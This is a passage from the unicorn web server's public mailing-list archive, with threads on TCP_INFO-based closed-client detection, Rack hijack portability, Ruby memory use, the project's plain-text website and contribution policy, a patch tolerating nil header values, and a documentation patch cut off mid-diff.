> have unintended side-effects in other servers; so I guess
> we (again) cannot rely on hijack working portably.

Exactly, it gives the illusion of portability but e.g. Puma stores an
instance variable to check whether a middleware hijacked, rendering
the `env#delete` option useless.

>
>> Cool. How would you suggest I check for TCP_INFO compatible platforms
>> in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
>> or do you prefer another mechanism? I agree that we should fall back
>> to the write hack on other platforms.
>
> The Raindrops::TCP_Info class should be undefined on unsupported
> platforms, so I think you can check for that, instead.  Then it
> should be transparent to add FreeBSD support from unicorn's
> perspective.

Perfect. I'll start working on a patch.

>
>
> (*) So I've been wondering if adding a "unicorn-mode" to an
>     existing C10K, slow-client-capable Ruby/Rack server +
>     reverse proxy makes sense for containerized deploys.
>     Maybe...

I'd love to hear more about this idea. What are you contemplating?

^ permalink raw reply	[relevance 0%]

* Re: check_client_connection using getsockopt(2)
  2017-02-22 20:09  3%   ` Simon Eskildsen
@ 2017-02-23  1:42  4%     ` Eric Wong
  2017-02-23  2:42  0%       ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-23  1:42 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:

<snip> Thanks for the writeup!

Another sidenote: It seems nginx <-> unicorn is a bit odd
for deployment in a containerized environment(*).

> I meant to ask, in Raindrops why do you use the netlink API to get the
> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
> `tcpi_unacked`? (as described in
> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
> monitor socket backlogs with a sidekick Ruby daemon. Although we're
> looking to replace it with a middleware to simplify for Kubernetes.
> It's one of our main metrics for monitoring performance, especially
> around deploys.

The netlink API allows independently-spawned processes to
monitor others; so it can be system-wide.  TCP_INFO requires the
process doing the checking to also have the socket open.

I guess this reasoning for using netlink is invalid for containers,
though...

> I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
> you could also do `env.delete("hijack_io")` after hijacking to allow
> Unicorn to still render the response. Unfortunately the
> `<webserver>.socket` key is not part of the Rack standard, so I'm
> hesitant to use it. When this gets into Unicorn I'm planning to
> propose it upstream to Puma as well.

I was going to say env.delete("rack.hijack_io") is dangerous
(since env could be copied by middleware); but apparently not:
rack.hijack won't work with a copied env, either.
You only need to delete with the same env object you call
rack.hijack with.

But calling rack.hijack followed by env.delete may still
have unintended side-effects in other servers; so I guess
we (again) cannot rely on hijack working portably.

> Cool. How would you suggest I check for TCP_INFO compatible platforms
> in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
> or do you prefer another mechanism? I agree that we should fall back
> to the write hack on other platforms.

The Raindrops::TCP_Info class should be undefined on unsupported
platforms, so I think you can check for that, instead.  Then it
should be transparent to add FreeBSD support from unicorn's
perspective.


(*) So I've been wondering if adding a "unicorn-mode" to an
    existing C10K, slow-client-capable Ruby/Rack server +
    reverse proxy makes sense for containerized deploys.
    Maybe...

^ permalink raw reply	[relevance 4%]

* Re: check_client_connection using getsockopt(2)
  2017-02-22 18:33  4% ` Eric Wong
@ 2017-02-22 20:09  3%   ` Simon Eskildsen
  2017-02-23  1:42  4%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-22 20:09 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, raindrops-public

On Wed, Feb 22, 2017 at 1:33 PM, Eric Wong <e@80x24.org> wrote:
> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>
> <snip> great to know it's still working after all these years :>
>
>> This confirms Eric's comment that the existing
>> `check_client_connection` works perfectly on loopback, but as soon as
>> you put an actual network between the Unicorn and client—it's only
>> effective 20% of the time, even with `TCP_NODELAY`. I'm assuming, due
>> to buffering, even when disabling Nagle's. As we're changing our
>> architecture, we move from ngx (lb) -> ngx (host) -> unicorn to ngx
>> (lb) -> unicorn. That means this patch will no longer work for us.
>
> Side comment: I'm a bit curious how you guys arrived at removing
> nginx at the host level (if you're allowed to share that info)
>
> I've mainly kept nginx on the same host as unicorn, but used
> haproxy or similar (with minimal buffering) at the LB level.
> That allows better filesystem load distribution for large uploads.


Absolutely. We're starting to experiment with Kubernetes, and a result
we're interested in simplifying ingress as much as possible. We could
still run them, but if I can avoid explaining why they're there for
the next 5 years—I'll be happy :) As I see it, the current use-cases we
have for the host nginx are (with why we can get rid of it):

* Keepalive between edge nginx LBs and host LBs to avoid excessive
network traffic. This is not a deal-breaker, so we'll just ignore this
problem. It's a _massive_ amount of traffic normally though.
* Out of rotation. We take nodes gracefully out of rotation by
touching a file that'll return 404 on a health-checking endpoint from
the edge LBs. Kubernetes implements this by just removing all the
containers on that node.
* Graceful deploys. When we deploy with containers, we take each
container out of rotation with the local host Nginx, wait for it to
come up, and put it back in rotation. We don't utilize Unicorns
graceful restarts because we want a Ruby upgrade deploy (replacing the
container) to be the same as an updated code rollout.
* File uploads. As you mention, currently we load-balance this between
them. I haven't finished the investigation on whether this is feasible
on the front LBs. Otherwise we may go for a 2-tier Nginx solution or
expand the edge. However, with Kubernetes I'd really like to avoid
having host nginxes. It's not very native to the Kubernetes paradigm.
Does it balance across the network, or only to the pods on that node?
* check_client_connection working. :-) This thread.

Slow clients and other advantages we find from the edge Nginxes.

>> I propose instead of the early `write(2)` hack, that we use
>> `getsockopt(2)` with the `TCP_INFO` flag and read the state of the
>> socket. If it's in `CLOSE_WAIT` or `CLOSE`, we kill the connection and
>> move on to the next.
>>
>> https://github.com/torvalds/linux/blob/8fa3b6f9392bf6d90cb7b908e07bd90166639f0a/include/uapi/linux/tcp.h#L163
>>
>> This is not going to be portable, but we can do this on only Linux
>> which I suspect is where most production deployments of Unicorn that
>> would benefit from this feature run. It's not useful in development
>> (which is likely more common to not be Linux). We could also introduce
>> it under a new configuration option if desired. In my testing, this
>> works to reject 100% of requests early when not on loopback.
>
> Good to know about its effectiveness!  I don't mind adding
> Linux-only features as long as existing functionality still
> works on the server-oriented *BSDs.
>
>> The code is essentially:
>>
>> def client_closed?
>>   tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
>>   state = tcp_info.unpack("c")[0]
>>   state == TCP_CLOSE || state == TCP_CLOSE_WAIT
>> end
>
> +Cc: raindrops-public@bogomips.org -> https://bogomips.org/raindrops-public/
>
> Fwiw, raindrops (already a dependency of unicorn) has TCP_INFO
> support under Linux:
>
> https://bogomips.org/raindrops.git/tree/ext/raindrops/linux_tcp_info.c
>
> I haven't used it, much, but FreeBSD also implements a subset of
> this feature, nowadays, and ought to be supportable, too.  We
> can look into adding it for raindrops.

Cool, I think it makes sense to use Raindrops here, advantage being
it'd use the actual struct instead of a sketchy `#unpack`.

I meant to ask, in Raindrops why do you use the netlink API to get the
socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
`tcpi_unacked`? (as described in
http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
monitor socket backlogs with a sidekick Ruby daemon. Although we're
looking to replace it with a middleware to simplify for Kubernetes.
It's one of our main metrics for monitoring performance, especially
around deploys.

>
> I don't know about other BSDs...
>
>> This could be called at the top of `#process_client` in `http_server.rb`.
>>
>> Would there be interest in this upstream? Any comments on this
>> proposed implementation? Currently, we're using a middleware with the
>> Rack hijack API, but this seems like it belongs at the webserver
>> level.
>
> I guess hijack means you have to discard other middlewares and
> the normal rack response handling in unicorn?  If so, ouch!
>
> Unfortunately, without hijack, there's no portable way in Rack
> to get at the underlying IO object; so I guess this needs to
> be done at the server level...
>
> So yeah, I guess it belongs in the webserver.

I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
you could also do `env.delete("hijack_io")` after hijacking to allow
Unicorn to still render the response. Unfortunately the
`<webserver>.socket` key is not part of the Rack standard, so I'm
hesitant to use it. When this gets into Unicorn I'm planning to
propose it upstream to Puma as well.

>
> I think we can automatically use TCP_INFO if available for
> check_client_connection; then fall back to the old early write
> hack for Unix sockets and systems w/o TCP_INFO (which would set
> the response_start_sent flag).
>
> No need to introduce yet another configuration option.

Cool. How would you suggest I check for TCP_INFO compatible platforms
in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
or do you prefer another mechanism? I agree that we should fall back
to the write hack on other platforms.

^ permalink raw reply	[relevance 3%]

* Re: check_client_connection using getsockopt(2)
  @ 2017-02-22 18:33  4% ` Eric Wong
  2017-02-22 20:09  3%   ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-22 18:33 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:

<snip> great to know it's still working after all these years :>

> This confirms Eric's comment that the existing
> `check_client_connection` works perfectly on loopback, but as soon as
> you put an actual network between the Unicorn and client—it's only
> effective 20% of the time, even with `TCP_NODELAY`. I'm assuming, due
> to buffering, even when disabling Nagle's. As we're changing our
> architecture, we move from ngx (lb) -> ngx (host) -> unicorn to ngx
> (lb) -> unicorn. That means this patch will no longer work for us.

Side comment: I'm a bit curious how you guys arrived at removing
nginx at the host level (if you're allowed to share that info)

I've mainly kept nginx on the same host as unicorn, but used
haproxy or similar (with minimal buffering) at the LB level.
That allows better filesystem load distribution for large uploads.

> I propose instead of the early `write(2)` hack, that we use
> `getsockopt(2)` with the `TCP_INFO` flag and read the state of the
> socket. If it's in `CLOSE_WAIT` or `CLOSE`, we kill the connection and
> move on to the next.
> 
> https://github.com/torvalds/linux/blob/8fa3b6f9392bf6d90cb7b908e07bd90166639f0a/include/uapi/linux/tcp.h#L163
> 
> This is not going to be portable, but we can do this on only Linux
> which I suspect is where most production deployments of Unicorn that
> would benefit from this feature run. It's not useful in development
> (which is likely more common to not be Linux). We could also introduce
> it under a new configuration option if desired. In my testing, this
> works to reject 100% of requests early when not on loopback.

Good to know about its effectiveness!  I don't mind adding
Linux-only features as long as existing functionality still
works on the server-oriented *BSDs.

> The code is essentially:
> 
> def client_closed?
>   tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
>   state = tcp_info.unpack("c")[0]
>   state == TCP_CLOSE || state == TCP_CLOSE_WAIT
> end

+Cc: raindrops-public@bogomips.org -> https://bogomips.org/raindrops-public/

Fwiw, raindrops (already a dependency of unicorn) has TCP_INFO
support under Linux:

https://bogomips.org/raindrops.git/tree/ext/raindrops/linux_tcp_info.c

I haven't used it, much, but FreeBSD also implements a subset of
this feature, nowadays, and ought to be supportable, too.  We
can look into adding it for raindrops.

I don't know about other BSDs...

> This could be called at the top of `#process_client` in `http_server.rb`.
> 
> Would there be interest in this upstream? Any comments on this
> proposed implementation? Currently, we're using a middleware with the
> Rack hijack API, but this seems like it belongs at the webserver
> level.

I guess hijack means you have to discard other middlewares and
the normal rack response handling in unicorn?  If so, ouch!

Unfortunately, without hijack, there's no portable way in Rack
to get at the underlying IO object; so I guess this needs to
be done at the server level...

So yeah, I guess it belongs in the webserver.

I think we can automatically use TCP_INFO if available for
check_client_connection; then fall back to the old early write
hack for Unix sockets and systems w/o TCP_INFO (which would set
the response_start_sent flag).

No need to introduce yet another configuration option.

^ permalink raw reply	[relevance 4%]

* Re: WTF is up with memory usage nowadays?
  @ 2017-02-08 20:00  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-02-08 20:00 UTC (permalink / raw)
  To: unicorn-public

Eric Wong <e@80x24.org> wrote:
>   The Rack response body only needs to respond to #each.
>   There should be no reason to build giant response
>   documents in memory before sending them to a client.
> 
>   unicorn can't do the following for you automatically since
>   we don't know how/if a Rack app will reuse a string;
>   but upstack authors can String#clear after yielding
>   in #each to ensure any malloced heap memory is immediately
>   available for future use (but beware of downstream middlewares
>   which do not expect this, too(**)):
> 
>     def each
>       # .. do something to generate a giant string
>       yield giant_string

... The yield above is so unicorn (or any server) can call
IO#write or similar (send(,_nonblock), write_nonblock, etc...).

That means once IO#write is complete, the contents of the string
is shipped off to the OS TCP stack and Ruby can forget about it:

>       giant_string.clear # String#clear
>     end

However, this is largely ineffective since Ruby 2.0.0 - 2.4.0
has a thread-safety fix which causes excessive garbage:

https://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=34847
https://svn.ruby-lang.org/cgi-bin/viewvc.cgi/trunk/io.c?r1=34847&r2=34846&pathrev=34847

And it looks like that went unnoticed for a few years...
Shame on all of us! :<

Anyways, it looks like an acceptable fix finally got accepted
for Ruby 2.5 (December 2017): https://bugs.ruby-lang.org/issues/13085

I've considered backporting a workaround into unicorn; but I'm
leaning against it since most apps do not recycle buffers at the
moment, so they make a lot of garbage, anyways.
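For illustration, the buffer-recycling pattern quoted above can be written
out as a complete Rack-style body. The class name is hypothetical; this is
a sketch of the pattern, not code from unicorn.

```ruby
class StreamingBody
  def initialize(chunks)
    @chunks = chunks
  end

  # Yield one reused buffer per chunk; clear it after each yield so the
  # heap memory backing it is immediately available for reuse once the
  # server's IO#write has shipped the bytes to the OS.
  def each
    buf = String.new
    @chunks.each do |chunk|
      buf << chunk
      yield buf
      buf.clear # String#clear
    end
  end
end
```

Note the caveat from the quoted message still applies: any downstream middleware that retains references to yielded strings will see them cleared.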

Another place unicorn uses IO#write is buffering large files in
the TeeInput class; but I'm not sure if enough people care about
large uploads.  Embarrassingly, most of the large I/O apps I
maintain are still on 1.9.3, so I did not notice it :x
In any case, anybody running an up-to-date trunk or willing
to wait until Ruby 2.5 won't have to worry or think about this.


But yeah, all of this means there's still both a runtime and
code complexity cost for supporting 1:1 native threads (at least
the way MRI does it).  This cost is there regardless of whether
or not the code you run uses threads.

^ permalink raw reply	[relevance 4%]

* Re: Unicorn is a famous and widely use software, but why official website look so outdate?
       [not found]     <CAOxZbrXuC-MTZjkQOREorkv8k4Cu9X3M5f_R1p8LYO+QyJhBug@mail.gmail.com>
@ 2016-05-26 21:57  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-05-26 21:57 UTC (permalink / raw)
  To: Zheng Cheng; +Cc: unicorn-public

Zheng Cheng <guokrfans@gmail.com> wrote:

Please don't send HTML email; it is bloated, spammy and your
mail got stuck in my spam filter instead of hitting the list.

About the Subject, unicorn itself is outdated by design:

	http://unicorn.bogomips.org/PHILOSOPHY.html
	http://unicorn.bogomips.org/DESIGN.html

This list rejecting HTML is another "outdated" characteristic
of the project :)

Being outdated is not bad IMHO; more of us had slower computers
and connections back then and needed to make every byte matter.
Many "modern" websites are slow and inaccessible to poor and/or
low-eyesight users.

The CSS on the old website was as big as the README page;
slowing or even breaking rendering.  Nowadays it does not depend
on CSS at all, and is designed to reduce scrolling for users
on small screens (or big screens and giant fonts :)

Enabling CSS may also be dangerous:

	http://thejh.net/misc/website-terminal-copy-paste

Slow connections still come from poorer areas and even the
well-off have connectivity trouble over Tor or mobile.  Some of
us have bad eyesight and need gigantic fonts and custom colors
to read.  Web designers should not set colors or fonts for us.

A "modern" website also sets unrealistic expectations for
maintainers and potential contributors.  unicorn is a daemon,
it can never require a graphical interface to run, so users
should not be expected to run one, either.

Fame and being widely used are accidents, since I put little effort
into marketing.  It's nice to have it solve some problems for
users, but market dominance is harmful to ecosystems.

> and why not put source code on Github,

GitHub bundles a proprietary, centralized messaging platform we
cannot opt-out of.  It also requires registration,
terms-of-service, and JavaScript to use.

Plain-text email is universal and interoperable.  unicorn and
Ruby do not require registration, terms-of-service or JavaScript
to use; so contributing should never require those things,
either; even anonymous contributions are welcome.
Plain-text email is the only additional requirement, and
anybody with Internet access hopefully has that.

> Write some Github Wiki,
> A contributor guide, Thing like that.

Some old-school projects have a "HACKING" file for contributors :)
http://unicorn.bogomips.org/HACKING.html

You can email comments, patches or pull requests here to improve
the docs (which become the website), so it's like a wiki with a
review process over email.

> I am a newbie just start learning Unicorn and can't find any good tutorial
> about Unicorn. and recommend?

There is a short Usage section in the README and Configurator
docs:
	http://unicorn.bogomips.org/#label-Usage
	http://unicorn.bogomips.org/Unicorn/Configurator.html

But unicorn is not for everyone, so I recommend starting with
rack and tutorials, since unicorn is built on rack:

	https://github.com/rack/rack/wiki/tutorial-rackup-howto

unicorn is one of many rack servers you can choose from.  I
encourage people to try other ones and evaluate based on their
needs; not whatever some other websites are using.
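For the curious, a minimal rackup file is tiny (a sketch; any Rack
server, unicorn included, can run it):

```ruby
# config.ru -- a minimal Rack app; start it with `unicorn config.ru`
# (or another Rack server's rackup equivalent).
app = lambda do |env|
  [200, { 'Content-Type' => 'text/plain' }, ["hello\n"]]
end
run app if respond_to?(:run) # `run` is provided by rackup's DSL
```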

> Thank you very much.

No problem :>

^ permalink raw reply	[relevance 3%]

* Re: undefined method `include?' for nil:NilClass (NoMethodError)
  @ 2015-11-17  0:27  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-11-17  0:27 UTC (permalink / raw)
  To: Owen Ou; +Cc: unicorn-public, api-team

Owen Ou <o@heroku.com> wrote:
> We recently upgraded to Unicorn 5.0 but getting the following error:
> 
> [2015-11-16T14:54:16.943652 #19838] ERROR -- : app error: undefined
> method `include?' for nil:NilClass (NoMethodError)
> 
> E, [2015-11-16T14:54:16.943712 #19838] ERROR -- :
> /home/api/vendor/bundle/ruby/2.2.0/gems/unicorn-5.0.0/lib/unicorn/http_response.rb:40:in
> `block in http_response_write'

<snip>

> The error came from this commit:
> https://github.com/defunkt/unicorn/commit/fb2f10e1d7a72e6787720003342a21f11b879614.
> And specifically the line of `if value =~ /\n/` is changed to `if
> value.include?("\n".freeze)`. Apparently `value` can be nil which
> caused our issue. It should be an easy fix.

Yes, easy, I reverted that hunk in the original change since it's
the easiest to verify as correct.  It's an unfortunate change to
have to make, though.

Thanks, will release 5.0.1 in less than a day...
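The difference between the two checks is easy to reproduce in a
standalone sketch (plain Ruby, no unicorn required):

```ruby
# nil =~ /regexp/ quietly returns nil via Object#=~, so the old
# regexp check tolerated nil header values; nil.include? raises
# NoMethodError, which is the failure reported above.
value = nil
old_check = (value =~ /\n/)  # falsy, no exception
new_check_error = nil
begin
  value.include?("\n")       # undefined method `include?' for nil
rescue NoMethodError => e
  new_check_error = e
end
```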

---------------------8<-----------------------
Subject: [PATCH] http_response: allow nil values in response headers

This blatantly violates Rack SPEC, but we've had this bug since
March 2009[1].  Thus, we cannot expect all existing applications
and middlewares to fix this bug and will probably have to
support it forever.

Unfortunately, supporting this bug contributes to application
server lock-in, but at least we'll document it as such.

[1] commit 1835c9e2e12e6674b52dd80e4598cad9c4ea1e84
    ("HttpResponse: speed up non-multivalue headers")

Reported-by: Owen Ou <o@heroku.com>
Ref: <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
---
  Side note: I don't intend to port this change to less-popular servers
  I maintain.  This bug is yet another example of why monoculture or
  even any sort of majority adoption hurts an ecosystem.

 lib/unicorn/http_response.rb | 2 +-
 test/unit/test_response.rb   | 9 +++++++++
 2 files changed, 10 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index c1aa738..7b446c2 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -37,7 +37,7 @@ def http_response_write(socket, status, headers, body,
           # key in Rack < 1.5
           hijack = value
         else
-          if value.include?("\n".freeze)
+          if value =~ /\n/
             # avoiding blank, key-only cookies with /\n+/
             value.split(/\n+/).each { |v| buf << "#{key}: #{v}\r\n" }
           else
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index 0b14d59..fbe433f 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -33,6 +33,15 @@ def test_response_headers
     assert out.length > 0, "output didn't have data"
   end
 
+  # ref: <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
+  def test_response_header_broken_nil
+    out = StringIO.new
+    http_response_write(out, 200, {"Nil" => nil}, %w(hysterical raisin))
+    assert ! out.closed?
+
+    assert_match %r{^Nil: \r\n}sm, out.string, 'nil accepted'
+  end
+
   def test_response_string_status
     out = StringIO.new
     http_response_write(out,'200', {}, [])
-- 
EW

^ permalink raw reply related	[relevance 3%]

* unicorn non-technical FAQ
@ 2015-10-14 20:12  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-10-14 20:12 UTC (permalink / raw)
  To: unicorn-public

Maybe this should be on the website somewhere, but the mailing list
archives are quite accessible nowadays.

Fwiw, I tend to followup publically (anonymized content) with technical
stuff to the private email address <unicorn@bogomips.org>, but never
publically address the non-technical questions.  But some of the same
questions come up over and over, so I figure an FAQ might help.


Q: Can I use your logo?

A: What logo?  This project has never had a logo and never will.
   Logos are a waste of bandwidth, processing power, and
   yet-another potential exploitable code execution and/or
   denial-of-service vector.

   Ask the webmaster of the site you saw the logo on.


Q: Can you speak at so-and-so conference?

A: I do not speak.  Speech is synchronous and I will inevitably
   speak too fast for some, too slow for others; all while wasting
   CPU power and bandwidth to encode and distribute audio.

   Text is much more efficient as the reader can read at their
   own pace, skim over uninteresting parts, scan, etc.
   Text is far cheaper to distribute, archive and search than audio.

   Besides, unicorn has been technically obsolete since the early 90s,
   there's nothing interesting to talk about.  Read the source,
   mailing list archives, git commit history, etc. instead.


Q: May I interview you?

A: You already started :)  I have plain-text email and nothing else.

^ permalink raw reply	[relevance 4%]

* [PATCH] doc: remove references to old servers
@ 2015-07-15 22:05  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-15 22:05 UTC (permalink / raw)
  To: unicorn-public

They'll continue to be maintained, but we're no longer advertising
them.  Also, favor lowercase "unicorn" while we're at it since that
matches the executable and gem name to avoid unnecessary escaping
for RDoc.
---
 Application_Timeouts             |  6 +++---
 KNOWN_ISSUES                     | 14 +++++++-------
 Links                            | 30 ++++++++++++++----------------
 PHILOSOPHY                       |  6 ------
 README                           | 32 ++++++++++++++++----------------
 Sandbox                          |  2 +-
 TUNING                           | 10 +++++-----
 examples/nginx.conf              | 21 ++++++++++-----------
 ext/unicorn_http/unicorn_http.rl |  2 +-
 lib/unicorn.rb                   |  6 +++---
 lib/unicorn/configurator.rb      | 24 ++++++++++--------------
 lib/unicorn/http_server.rb       |  4 ++--
 lib/unicorn/socket_helper.rb     |  8 +++-----
 lib/unicorn/util.rb              |  2 +-
 lib/unicorn/worker.rb            |  4 ++--
 15 files changed, 78 insertions(+), 93 deletions(-)

diff --git a/Application_Timeouts b/Application_Timeouts
index 5f0370d..561a1cc 100644
--- a/Application_Timeouts
+++ b/Application_Timeouts
@@ -4,10 +4,10 @@ This article focuses on _application_ setup for Rack applications, but
 can be expanded to all applications that connect to external resources
 and expect short response times.
 
-This article is not specific to \Unicorn, but exists to discourage
+This article is not specific to unicorn, but exists to discourage
 the overuse of the built-in
 {timeout}[link:Unicorn/Configurator.html#method-i-timeout] directive
-in \Unicorn.
+in unicorn.
 
 == ALL External Resources Are Considered Unreliable
 
@@ -71,7 +71,7 @@ handle network/server failures.
 == The Last Line Of Defense
 
 The {timeout}[link:Unicorn/Configurator.html#method-i-timeout] mechanism
-in \Unicorn is an extreme solution that should be avoided whenever
+in unicorn is an extreme solution that should be avoided whenever
 possible.  It will help catch bugs in your application where and when
 your application forgets to use timeouts, but it is expensive as it
 kills and respawns a worker process.
diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index 1950223..6b80517 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -13,7 +13,7 @@ acceptable solution.  Those issues are documented here.
 
 * PRNGs (pseudo-random number generators) loaded before forking
   (e.g. "preload_app true") may need to have their internal state
-  reset in the after_fork hook.  Starting with \Unicorn 3.6.1, we
+  reset in the after_fork hook.  Starting with unicorn 3.6.1, we
   have builtin workarounds for Kernel#rand and OpenSSL::Random users,
   but applications may use other PRNGs.
 
@@ -36,13 +36,13 @@ acceptable solution.  Those issues are documented here.
 
 * Under some versions of Ruby 1.8, it is necessary to call +srand+ in an
   after_fork hook to get correct random number generation.  We have a builtin
-  workaround for this starting with \Unicorn 3.6.1
+  workaround for this starting with unicorn 3.6.1
 
   See http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-core/36450
 
 * On Ruby 1.8 prior to Ruby 1.8.7-p248, *BSD platforms have a broken
   stdio that causes failure for file uploads larger than 112K.  Upgrade
-  your version of Ruby or continue using Unicorn 1.x/3.4.x.
+  your version of Ruby or continue using unicorn 1.x/3.4.x.
 
 * Under Ruby 1.9.1, methods like Array#shuffle and Array#sample will
   segfault if called after forking.  Upgrade to Ruby 1.9.2 or call
@@ -53,12 +53,12 @@ acceptable solution.  Those issues are documented here.
 
 * Rails 2.3.2 bundles its own version of Rack.  This may cause subtle
   bugs when simultaneously loaded with the system-wide Rack Rubygem
-  which Unicorn depends on.  Upgrading to Rails 2.3.4 (or later) is
+  which unicorn depends on.  Upgrading to Rails 2.3.4 (or later) is
   strongly recommended for all Rails 2.3.x users for this (and security
   reasons).  Rails 2.2.x series (or before) did not bundle Rack and are
   should be unnaffected.  If there is any reason which forces your
   application to use Rails 2.3.2 and you have no other choice, then
-  you may edit your Unicorn gemspec and remove the Rack dependency.
+  you may edit your unicorn gemspec and remove the Rack dependency.
 
   ref: http://mid.gmane.org/20091014221552.GA30624@dcvr.yhbt.net
   Note: the workaround described in the article above only made
@@ -71,9 +71,9 @@ acceptable solution.  Those issues are documented here.
     set :env, :production
     set :run, false
   Since this is no longer an issue with Sinatra 0.9.x apps, this will not be
-  fixed on our end.  Since Unicorn is itself the application launcher, the
+  fixed on our end.  Since unicorn is itself the application launcher, the
   at_exit handler used in old Sinatra always caused Mongrel to be launched
-  whenever a Unicorn worker was about to exit.
+  whenever a unicorn worker was about to exit.
 
   Also remember we're capable of replacing the running binary without dropping
   any connections regardless of framework :)
diff --git a/Links b/Links
index 5a586c1..ad05afd 100644
--- a/Links
+++ b/Links
@@ -1,13 +1,13 @@
 = Related Projects
 
-If you're interested in \Unicorn, you may be interested in some of the projects
+If you're interested in unicorn, you may be interested in some of the projects
 listed below.  If you have any links to add/change/remove, please tell us at
 mailto:unicorn-public@bogomips.org!
 
 == Disclaimer
 
-The \Unicorn project is not responsible for the content in these links.
-Furthermore, the \Unicorn project has never, does not and will never endorse:
+The unicorn project is not responsible for the content in these links.
+Furthermore, the unicorn project has never, does not and will never endorse:
 
 * any for-profit entities or services
 * any non-{Free Software}[http://www.gnu.org/philosophy/free-sw.html]
@@ -15,13 +15,13 @@ Furthermore, the \Unicorn project has never, does not and will never endorse:
 The existence of these links does not imply endorsement of any entities
 or services behind them.
 
-=== For use with \Unicorn
+=== For use with unicorn
 
 * {Bluepill}[https://github.com/arya/bluepill] -
   a simple process monitoring tool written in Ruby
 
 * {golden_brindle}[https://github.com/simonoff/golden_brindle] - tool to
-  manage multiple \Unicorn instances/applications on a single server
+  manage multiple unicorn instances/applications on a single server
 
 * {raindrops}[http://raindrops.bogomips.org/] - real-time stats for
   preforking Rack servers
@@ -29,27 +29,25 @@ or services behind them.
 * {UnXF}[http://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
   useful since unicorn is designed to be deployed behind a reverse proxy.
 
-=== \Unicorn is written to work with
+=== unicorn is written to work with
 
 * {Rack}[http://rack.github.io/] - a minimal interface between webservers
   supporting Ruby and Ruby frameworks
 
 * {Ruby}[https://www.ruby-lang.org/en/] - the programming language of
-  Rack and \Unicorn
+  Rack and unicorn
 
-* {nginx}[http://nginx.org/] - the reverse proxy for use with \Unicorn
+* {nginx}[http://nginx.org/] - the reverse proxy for use with unicorn
 
-* {kgio}[http://bogomips.org/kgio/] - the I/O library written for \Unicorn
+* {kgio}[http://bogomips.org/kgio/] - the I/O library written for unicorn
+  (deprecated and functionality being mainlined into Ruby)
 
 === Derivatives
 
-* {Green Unicorn}[http://gunicorn.org/] - a Python version of \Unicorn
+* {Green Unicorn}[http://gunicorn.org/] - a Python version of unicorn
 
-* {Rainbows!}[http://rainbows.bogomips.org/] - \Unicorn for sleepy
-  apps and slow clients (historical).
-
-* {yahns}[http://yahns.yhbt.net/] - like Rainbows!, but with fewer options
-  and designed for energy efficiency on idle sites.
+* {yahns}[http://yahns.yhbt.net/] - the complete opposite of unicorn in
+  every imaginable way.  Designed for energy efficiency on idle sites.
 
 === Prior Work
 
@@ -57,4 +55,4 @@ or services behind them.
   unicorn is based on
 
 * {david}[http://bogomips.org/david.git] - a tool to explain why you need
-  nginx in front of \Unicorn
+  nginx in front of unicorn
diff --git a/PHILOSOPHY b/PHILOSOPHY
index 18b2d82..feb83d9 100644
--- a/PHILOSOPHY
+++ b/PHILOSOPHY
@@ -137,9 +137,3 @@ unicorn is highly inefficient for Comet/reverse-HTTP/push applications
 where the HTTP connection spends a large amount of time idle.
 Nevertheless, the ease of troubleshooting, debugging, and management of
 unicorn may still outweigh the drawbacks for these applications.
-
-The {Rainbows!}[http://rainbows.bogomips.org/] aims to fill the gap for
-odd corner cases where the nginx + unicorn combination is not enough.
-While Rainbows! management/administration is largely identical to
-unicorn, Rainbows! is far more ambitious and has seen little real-world
-usage.
diff --git a/README b/README
index bd626e9..dc121d3 100644
--- a/README
+++ b/README
@@ -1,10 +1,10 @@
-= Unicorn: Rack HTTP server for fast clients and Unix
+= unicorn: Rack HTTP server for fast clients and Unix
 
-\Unicorn is an HTTP server for Rack applications designed to only serve
+unicorn is an HTTP server for Rack applications designed to only serve
 fast clients on low-latency, high-bandwidth connections and take
 advantage of features in Unix/Unix-like kernels.  Slow clients should
 only be served by placing a reverse proxy capable of fully buffering
-both the the request and response in between \Unicorn and slow clients.
+both the the request and response in between unicorn and slow clients.
 
